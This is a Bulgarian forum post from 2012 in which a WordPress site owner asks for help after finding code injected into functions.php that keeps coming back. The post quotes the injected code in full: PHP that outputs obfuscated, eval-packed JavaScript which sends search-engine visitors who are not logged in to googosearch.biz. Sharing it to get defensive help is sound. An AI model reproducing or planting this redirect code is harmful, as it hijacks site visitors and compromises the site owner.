Заразен functions.php на WordPress
Здравейте,
Имам следния проблем с WordPress блог, вкаран ми е някакъв php код във functions.php:
Код:
<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script
language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('e
r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>който редиректва влизанията от търсачките към някакъв сайт- googosearch.biz . Махам кода 2-3 пъти и пак го вмъква някой след няколко дена. Как да защитя сайта за да няма достъп до functions.php? Някакви идеи?
Има ли смисъл да слагам някакви допълнителни security плъгини от сорта на Askapache-password-protect, Bulletproof-security, Better-wp-security или др. подобни?
ФорумиFebruary 10, 2012
Leave a Reply